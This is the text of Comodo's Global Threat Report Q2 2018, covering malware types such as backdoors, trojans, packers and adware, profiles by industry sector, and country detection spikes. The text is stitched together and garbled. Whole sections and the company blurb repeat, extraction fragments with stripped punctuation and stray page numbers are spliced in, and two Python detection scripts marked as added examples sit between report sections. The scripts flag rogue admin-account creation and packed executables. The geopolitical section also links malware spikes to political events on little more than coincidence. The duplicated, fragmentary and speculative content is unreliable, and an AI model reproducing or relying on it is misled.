Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.

Two conclusions follow. First, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.

7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.

7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.

7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.

7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual, or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.

7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.

7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.

7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.

7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.

7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".

7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.

8 Conclusions

In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence, and much harder to detect by antivirus software. Propagation of fileless malware, the evolution of cryptominers, and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies and postures.


About Comodo Cybersecurity

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.


Global Threat Report Q2 2018 Edition

Page 47 of 73

521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program

The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage

The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2

The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018

5.2.2 Viruses

A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.

Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (.exe) and HTML files (.html) and spreads through infected removable drives such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.

5.2.3 Trojans

Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".

The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.
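As an added defender-side example (not code from the Comodo report), the following script flags the account-creation pattern attributed to Starter above: a local account created and, within minutes, added to the Administrators group. It walks a constructed JSON-lines export of Windows Security events; event IDs 4720 and 4732 and the field names are the real ones, while the account names, SIDs, timestamps and the 10-minute window are assumptions made for the demo.

```python
"""Detect a freshly created local account being added to Administrators,
the behaviour the report attributes to the Starter trojan.

Added example, not code from the Comodo report. Event IDs 4720 (user account
created) and 4732 (member added to a security-enabled local group) and the
field names match the Windows Security log; every value below is constructed.
"""
import json
from datetime import datetime, timedelta

ADMIN_GROUP_SID = "S-1-5-32-544"  # well-known SID of BUILTIN\Administrators
STARTER_ACCOUNT_NAME = "remote service account"  # name reported for Starter

# Constructed sample export, one JSON object per line (SIEM-style).
SAMPLE_LOG = """\
{"time": "2018-06-02T09:14:07Z", "id": 4720, "SubjectUserName": "alice", "TargetUserName": "Remote Service Account", "TargetSid": "S-1-5-21-1-2-3-1105"}
{"time": "2018-06-02T09:14:09Z", "id": 4732, "SubjectUserName": "alice", "MemberSid": "S-1-5-21-1-2-3-1105", "TargetUserName": "Administrators", "TargetSid": "S-1-5-32-544"}
{"time": "2018-06-02T10:30:00Z", "id": 4720, "SubjectUserName": "helpdesk", "TargetUserName": "bob", "TargetSid": "S-1-5-21-1-2-3-1106"}
{"time": "2018-06-02T11:05:00Z", "id": 4732, "SubjectUserName": "helpdesk", "MemberSid": "S-1-5-21-1-2-3-1101", "TargetUserName": "Administrators", "TargetSid": "S-1-5-32-544"}
{"time": "2018-06-03T08:00:00Z", "id": 4732, "SubjectUserName": "helpdesk", "MemberSid": "S-1-5-21-1-2-3-1106", "TargetUserName": "Administrators", "TargetSid": "S-1-5-32-544"}
"""


def parse_events(text):
    """Parse a JSON-lines export into dicts, oldest event first."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        ev["time"] = datetime.strptime(ev["time"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(ev)
    return sorted(events, key=lambda e: e["time"])


def find_rogue_admin_accounts(events, window=timedelta(minutes=10)):
    """Return one alert per account that was created and then added to
    Administrators within `window`. Legitimate provisioning usually separates
    the two steps by far longer, so a short window keeps noise down."""
    created = {}  # TargetSid of the new account -> its 4720 event
    alerts = []
    for ev in events:
        if ev["id"] == 4720:
            created[ev["TargetSid"]] = ev
        elif ev["id"] == 4732 and ev.get("TargetSid") == ADMIN_GROUP_SID:
            origin = created.get(ev["MemberSid"])
            if origin is None:
                continue  # pre-existing account; out of scope for this rule
            age = ev["time"] - origin["time"]
            if age <= window:
                name = origin["TargetUserName"]
                alerts.append({
                    "account": name,
                    "sid": ev["MemberSid"],
                    "created_by": origin["SubjectUserName"],
                    "seconds_to_admin": int(age.total_seconds()),
                    "name_matches_starter": name.lower() == STARTER_ACCOUNT_NAME,
                })
    return alerts


if __name__ == "__main__":
    for alert in find_rogue_admin_accounts(parse_events(SAMPLE_LOG)):
        print(alert)
```

Only the "Remote Service Account" entry trips the rule; the helpdesk account added to Administrators a day after creation does not, unless the window is widened.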

5.2.4 Exploits

Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial-of-service (DoS).

The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.

In Q2 2018, the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (.pdf) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.

5.3 Medium Threat Malware

In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.

5.3.1 Constructor

Constructors are applications that can be used to automatically create malware files.

For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.

In Q2, Germany (de) was the top country of detection for Constructors.

And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.

5.3.2 Packers

Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm, UCL, which is just a few hundred bytes of code in length.

In Q2 2018, Russia was the #1 home to malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
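The two checks a defender would run for the Packers described above, as an added example that is not code from the Comodo report: a section-name test that catches stock UPX, and a per-section entropy measurement that still flags a modified (MUPX) build whose sections have been renamed. The script parses the PE section table itself; the PE image it analyses is constructed inside build_sample_pe(), and the 7.0-bit threshold is an assumed working value.

```python
"""Triage a PE file for packing, the way a defender would look for UPX/MUPX
samples such as the Packers discussed above.

Added example, not code from the Comodo report. Stock UPX names its sections
UPX0/UPX1, so a name check catches it; modified UPX builds commonly rename
sections, so the script also measures each section's Shannon entropy, which
stays high for compressed or encrypted payloads regardless of the name.
The PE bytes used for the demo are constructed in build_sample_pe().
"""
import hashlib
import math
import struct

UPX_SECTION_NAMES = {b"UPX0", b"UPX1", b"UPX2"}
HIGH_ENTROPY = 7.0   # bits per byte (assumed threshold); plain code sits lower
MIN_SIZE = 256       # too few bytes give a meaningless entropy figure


def shannon_entropy(data):
    """Bits of entropy per byte (0.0 for empty input, 8.0 is the maximum)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_sections(blob):
    """Walk the section table of a PE image and yield (name, raw_bytes)."""
    if blob[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", blob, e_lfanew + 4)
    table = e_lfanew + 24 + opt_size
    for i in range(nsections):
        hdr = struct.unpack_from("<8sIIIIIIHHI", blob, table + 40 * i)
        name, raw_size, raw_ptr = hdr[0].rstrip(b"\0"), hdr[3], hdr[4]
        yield name, blob[raw_ptr:raw_ptr + raw_size]


def assess_pe(blob):
    """Return per-section findings and an overall 'packed' verdict."""
    sections = []
    for name, data in pe_sections(blob):
        flags = []
        if name in UPX_SECTION_NAMES:
            flags.append("upx-section-name")
        ent = shannon_entropy(data)
        if len(data) >= MIN_SIZE and ent >= HIGH_ENTROPY:
            flags.append("high-entropy")
        sections.append({"name": name.decode("ascii", "replace"),
                         "size": len(data), "entropy": round(ent, 2), "flags": flags})
    return {"packed": any(s["flags"] for s in sections), "sections": sections}


def pseudo_random(n, seed=b"constructed"):
    """Deterministic high-entropy bytes standing in for a compressed payload."""
    out, h = bytearray(), seed
    while len(out) < n:
        h = hashlib.sha256(h).digest()
        out += h
    return bytes(out[:n])


def build_sample_pe(section_names):
    """Constructed minimal PE: MZ stub, PE signature, COFF header, no optional
    header, three sections. Section 0 mimics UPX0 (reserved, no raw data),
    section 1 carries the 'compressed' payload, section 2 is plain resources."""
    payloads = [b"", pseudo_random(4096), b"Resource strings for the demo binary. " * 64]
    raw_start, ptr = 0x200, 0x200
    table, body = b"", b""
    for i, (name, data) in enumerate(zip(section_names, payloads)):
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"),
                             len(data) or 0x10000, 0x1000 * (i + 1), len(data),
                             ptr if data else 0, 0, 0, 0, 0, 0x60000020)
        body += data
        ptr += len(data)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)  # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(payloads), 0, 0, 0, 0, 0x0102)
    head = dos + b"PE\0\0" + coff + table
    return head.ljust(raw_start, b"\0") + body


if __name__ == "__main__":
    for names in ([b"UPX0", b"UPX1", b".rsrc"], [b".text", b".data", b".rsrc"]):
        print(assess_pe(build_sample_pe(names)))
```

With the sections renamed to .text/.data/.rsrc the name check is silent, but the payload section is still reported as high-entropy, which is the signal that survives an MUPX rename.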

5.3.3 Email Flooder

Email Flooders are malware used to overwhelm email servers with messages in order to "kill" them or shut them down, in a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that, while the number of Palevo detections was not high, it was still a persistent threat in Germany.

5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.

5.3.5 Jokes

"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous – but still something to be aware of.

5.4 Low Threat Malware Applications

In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.

5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application" or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.

5.4.2 Unwanted Applications

The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.

5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs, but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite, and include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US – and to a lesser extent Ukraine – have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.

6 Vertical analysis

In this section, let's examine unique malware profiles that Comodo identified within specific "verticals" or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each Vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected not only in one but within multiple verticals, clearly making them a current strategic threat across the world.

First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers, but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.

Two conclusions follow. First, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.

7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking – commonly called cyber espionage – which today takes place on a far greater scale than the public realizes.

7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services – both foreign and domestic – were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.

7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.

7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.

7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities – from social activities to business, politics or national security affairs – are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information – or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.

7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.

7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.

7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection – and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.

7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".

7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike – by far – occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa – precisely where the summit was scheduled to take place.

8 Conclusions

In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence and much harder to detect by antivirus software. Propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies and postures.

NORTH AMERICA
Comodo Security Solutions, Inc., 1255 Broad Street, Clifton, NJ 07013, United States. Tel: +1 (888) 551 1531, +1 (888) 266 6361; Int: +1 (703) 581 6361; Fax: +1 (973) 777 4394; sales@comodo.com

EUROPE
Comodo Security Solutions, Inc., Șoseaua Națională 31, Iași 700237, Romania. Tel: +40 332 806 772

ASIA
Comodo Security Solutions Pvt. Ltd., Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India. Tel: +91 44 4562 2800; www.comodo.co.in

Request a demo: try Comodo Cybersecurity by speaking with a security consultant to begin the process to set up a demo or proof-of-concept project. Contact us directly at +1 888-266-6361.

© 2018 All Rights Reserved. Comodo Security Solutions, Inc. Visit comodo.com.

About Comodo Cybersecurity

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown", potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.


Global Threat Report Q2 2018 Edition

Page 48 of 73

522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink

